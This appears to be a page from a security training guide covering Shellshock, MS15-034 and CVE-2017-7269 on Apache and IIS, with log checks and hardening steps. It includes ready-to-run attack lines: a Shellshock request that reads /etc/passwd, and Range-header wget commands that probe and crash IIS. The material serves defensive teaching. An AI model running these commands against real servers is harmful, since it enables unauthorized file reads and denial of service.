Vulnerabilities on Servers

Server Vulnerabilities: Understanding and Mitigating Risks

Web servers are frequent targets for attackers due to their critical role in hosting applications and services. This section covers notable vulnerabilities in Apache, Nginx, and IIS web servers, highlighting exploitation techniques, log analysis, and protection strategies.

1. Apache Web Server

Vulnerability: CVE-2014-6271 (Shellshock)

Description:

  • Exploits a flaw in the Bash shell when processing environment variables.

  • Affects systems using mod_cgi or mod_cgid to execute CGI scripts.

Attack Scenario:

  • The attacker injects malicious commands via the HTTP_USER_AGENT or other HTTP headers.

Example Command:

echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /bin/cat /etc/passwd\r\nHost: TARGET_ADDRESS\r\nConnection: close\r\n\r\n" | nc TARGET_ADDRESS 80

Outcome:

  • The /etc/passwd file contents are returned in the HTTP response.

Log Analysis: Look for suspicious requests targeting CGI scripts:

cat /var/log/apache2/access.log | grep "/cgi-bin"

Protection:

  • Update Bash to a patched version:

    sudo apt-get update && sudo apt-get install --only-upgrade bash

  • Disable mod_cgi if not required:

    sudo a2dismod cgi
sudo systemctl restart apache2

2. Nginx Web Server

Observation:

Between 2010 and 2017, no critical vulnerabilities were reported for Nginx. However, maintaining proper configuration and timely updates is essential to mitigate emerging threats.

Protection Recommendations:

  • Regular Updates: Keep Nginx up-to-date using your system's package manager:

    sudo apt-get update && sudo apt-get upgrade nginx

  • Configuration Hardening:

    • Disable directory listing:

      autoindex off;

    • Limit request size to prevent buffer overflows:

      client_max_body_size 1M;

3. IIS Web Server

Vulnerability 1: MS15-034 (Range Header Exploit)

Description:

  • Exploits a flaw in HTTP.sys, the kernel driver for handling HTTP requests in IIS.

  • Allows remote code execution or denial of service (DoS) using crafted Range headers.

Attack Scenario:

  • Sending a malformed Range header triggers the vulnerability.

Example Commands:

  1. Confirming vulnerability:

    wget --header="Range: bytes=0-18446744073709551615" http://TARGET_IP/resource.png

  2. Exploiting DoS:

    wget --header="Range: bytes=18-18446744073709551615" http://TARGET_IP/resource.png

Log Analysis: Check logs for unusual Range header requests:

grep "Range" C:\inetpub\logs\LogFiles\W3SVC1\*.log

Protection:

  • Apply relevant Windows updates and patches.

  • Disable HTTP.sys Range processing:

    Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Services\HTTP\Parameters" -Name "EnableRangeProcessing" -Value 0

Vulnerability 2: CVE-2017-7269 (WebDAV RCE)

Description:

  • Exploits a buffer overflow vulnerability in the ScStoragePathFromUrl function within WebDAV on IIS 6.0.

  • Can lead to remote code execution.

Affected Systems:

  • IIS 6.0 on Windows Server 2003 R2.

Exploitation:

  • Use Metasploit’s iis_webdav_scstoragepathfromurl module.

Log Analysis: Identify suspicious WebDAV requests in IIS logs:

grep "PROPFIND" C:\inetpub\logs\LogFiles\W3SVC1\*.log

Protection:

  • Upgrade IIS to version 7 or higher.

  • Disable WebDAV if not in use:

    Remove-WindowsFeature Web-DAV-Publishing

General Protection Strategies

1. Patch and Update Regularly

Ensure that web servers and underlying operating systems are updated with the latest security patches.

2. Disable Unused Modules and Services

  • Disable mod_cgi in Apache.

  • Remove WebDAV in IIS if not required.

  • Restrict access to sensitive endpoints like admin panels.

3. Harden Network and Server Configurations

  • Use firewalls to restrict access to administrative interfaces.

  • Employ IP whitelisting for management portals.

4. Log Monitoring and Alerting

  • Centralize logs using tools like the ELK Stack or Splunk.

  • Configure alerts for suspicious patterns such as:

    • Directory traversal (../).

    • SQL injection payloads (UNION SELECT).

    • Malicious Range headers.

5. Use Web Application Firewalls (WAFs)

Deploy WAFs to filter and block common web server attacks automatically.

Key Points

Servers are often the first line of defense in an organization's infrastructure. By understanding key vulnerabilities in Apache, Nginx, and IIS and implementing robust protection strategies, organizations can reduce their attack surface and safeguard sensitive information against a wide range of cyber threats. Regular updates, proper configuration, and vigilant monitoring are essential components of a secure server environment.

PreviousAttacks Against Web ApplicationsNextVulnerabilities in Programming Language

Last updated